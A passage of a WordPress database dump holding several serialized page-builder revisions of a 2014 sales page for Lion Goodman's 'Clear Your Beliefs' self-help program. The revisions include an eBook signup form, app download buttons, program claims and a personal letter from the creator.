-15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:747:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 37px;;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2637:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1142, 1624, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:764:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2637:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1143, 1625, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:764:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2637:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
